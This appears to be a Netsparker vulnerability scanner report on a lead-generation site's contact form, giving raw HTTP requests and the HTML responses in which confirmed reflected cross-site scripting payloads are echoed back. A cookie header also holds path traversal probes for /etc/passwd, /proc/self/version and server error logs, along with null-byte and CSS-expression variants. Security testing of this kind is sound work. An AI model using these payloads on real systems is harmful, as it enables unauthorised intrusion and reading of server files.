href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> 
</a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. 
Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="teledirectcasestudy"> <input type="hidden" name="parentPage" value="'"--></style></script><script>netsparker(0x0011AF)</script>"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"&g..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
parentPage POST 3
phone POST '"--></style></script><script>alert(0x0011BB)</script>
src POST teledirectcasestudy
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 233
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&parentPage=3&phone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0011BB)%3c%2fscript%3e&src=teledirectcasestudy&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:39:43 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=CDFE7220E5554E69E07D8786694C541F; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> 
</a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. 
Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="teledirectcasestudy"> <input type="hidden" name="parentPage" value="3"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="'"--></style></script><script>netsparker(0x0011BB)</script>"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"&g..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
parentPage POST 3
phone POST 3
src POST '"--></style></script><script>alert(0x0011CA)</script>
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 215
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&parentPage=3&phone=3&src='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0011CA)%3c%2fscript%3e&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:39:49 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=354DBE6AA3704B2A0A7648954F993972; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px 